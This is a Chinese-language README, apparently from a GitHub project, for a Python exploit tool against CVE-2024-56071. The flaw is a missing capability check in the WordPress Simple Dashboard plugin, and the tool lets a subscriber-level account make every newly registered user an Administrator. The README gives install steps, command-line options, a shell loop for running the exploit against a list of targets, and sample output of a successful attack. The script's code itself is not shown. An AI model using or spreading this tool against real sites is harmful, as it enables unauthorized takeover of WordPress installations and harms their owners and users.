Simple Dashboard 漏洞利用工具 - WordPress 权限提升这是一个针对 WordPress Sim

🚨 Simple Dashboard 漏洞利用工具

针对 WordPress Simple Dashboard 插件 <= 2.0 的权限提升漏洞（CVE-2024-56071）
本项目提供了一个完整的 Python 漏洞利用脚本，允许经过身份验证的低权限用户将新注册用户的默认角色提升为管理员。

📦 安装指南

系统要求

Python 3.6 或更高版本
已安装 requests 库

安装步骤

克隆或下载脚本

git clone https://github.com/your-repo/simple-dashboard-exploit.git
cd simple-dashboard-exploit

安装依赖
```
pip install requests
```
验证安装
```
python CVE-2024-56071.py -h
```
如果看到帮助信息，说明安装成功。

---|------| | -u, --url | WordPress 基础 URL（例如 http://target.com/wordpress） | | -U, --username | WordPress 用户名（可以是订阅者等低权限用户） | | -P, --password | 对应用户的密码 | | -h, --help | 显示帮助信息 |

典型使用场景

场景 1：低权限用户进行权限提升

攻击者拥有一个**订阅者（Subscriber）**账号
运行脚本并提供该账号的凭据
脚本自动登录并上传恶意配置
之后任何新注册的用户都将自动获得管理员权限

场景 2：自动化渗透测试

# 批量测试多个目标
for url in $(cat targets.txt); do
    python CVE-2024-56071.py -u $url -U testuser -P testpass
done

成功输出示例

[*] Attempting to log in...
[+] Logged in successfully as 'subscriber_user'.
[*] Sending malicious settings file to escalate privileges...
[+] Exploitation successful!
[!] You can now register a new account at: http://target.com/wordpress/wp-login.php?action=register
[!] The new user will automatically receive Administrator privileges.

📝 漏洞详情

CVE 编号：CVE-2024-56071
CVSS 评分：9.8（严重）
影响版本：Simple Dashboard 插件 <= 2.0
漏洞类型：缺失权限检查（Missing Capability Check）
攻击前提：拥有任意 WordPress 账号（即使只有订阅者权限）
攻击结果：可将新注册用户的默认角色设置为管理员 6HFtX5dABrKlqXeO5PUv/3NiN1uKaw0zUXfP0t8c9B8=